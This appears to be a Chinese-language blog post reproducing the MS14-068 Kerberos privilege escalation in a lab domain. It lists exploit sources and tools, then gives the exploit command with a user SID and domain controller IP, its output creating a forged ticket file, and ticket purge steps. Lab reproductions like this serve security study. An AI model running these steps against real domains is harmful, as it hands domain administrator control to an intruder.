ms14-068 漏洞复现

一、实验环境

  在企业环境中域环境管理电脑,可通过拿到域控制管理员账号权限,可控制整个域环境的电脑。

1、域环境搭建

  域环境搭建省略。

2、win7加入域

注意:域环境下的 administrator 账号可以登录其他所有成员机,但普通域账号没权限登录域控!

3、漏洞说明

  微软官方解释: https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2014/ms14-068

  漏洞作用:可将域中一台主机的普通用户提升到域管理员权限

4、查看目标是否存在MS14-068漏洞

二、漏洞利用

1、渗透代码:

root@kali:~/Desktop/test# searchsploit ms14-068
---------------------------------------- ----------------------------------------
 Exploit Title                          |  Path
                                        | (/usr/share/exploitdb/)
---------------------------------------- ----------------------------------------
Microsoft Windows Kerberos - Privilege  | exploits/windows/remote/35474.py
---------------------------------------- ----------------------------------------

或:https://www.exploit-db.com/exploits/35474

2、现成工具

  Ms14-068.exe:https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068

  PSexec:https://github.com/crupper/Forensics-Tool-Wiki/blob/master/windowsTools/PsExec64.exe

3、生成票据文件(二选一) 

(1)渗透代码生成

  需安装的库:https://github.com/mubix/pykek

root@kali:/usr/lib/python2.7# mv /pykek/* /usr/local/lib/python2.7/dist-packages/
root@kali:/usr/lib/python2.7# ls /usr/local/lib/python2.7/dist-packages/
kek  ms14-068.py  pyasn1  pykek
root@kali:~/Desktop/test# python /root/Desktop/test/35474.py  -u win7@lab.com -s S-1-5-21-2143070836-2917229441-1237987123-1115 -d 10.10.10.130 
Password: 
  [+] Building AS-REQ for 10.10.10.130... Done!
  [+] Sending AS-REQ to 10.10.10.130... Done!
  [+] Receiving AS-REP from 10.10.10.130... Done!
  [+] Parsing AS-REP from 10.10.10.130... Done!
  [+] Building TGS-REQ for 10.10.10.130... Done!
  [+] Sending TGS-REQ to 10.10.10.130... Done!
  [+] Receiving TGS-REP from 10.10.10.130... Done!
  [+] Parsing TGS-REP from 10.10.10.130... Done!
  [+] Creating ccache file 'TGT_win7@lab.com.ccache'... Done!

注意:-d 指定域控制器名称/IP【除非kali也指定同一个DNS(域控),否则需要写入IP地址】

(2)Ms14-068.exe生成

 

4、实测

(1)利用前

(2)查看 / 删除当前域机器的票证:Kerberos::list/purge

(3)结果

上面是将与普通域账号提权至administrator权限,同理可将 win7 本地管理员账号提权至域控administrator权限,如:

备注:admin$共享的开启

posted @ 2022-02-23 17:49  z9m8r8  阅读(106)  评论(0编辑  收藏  举报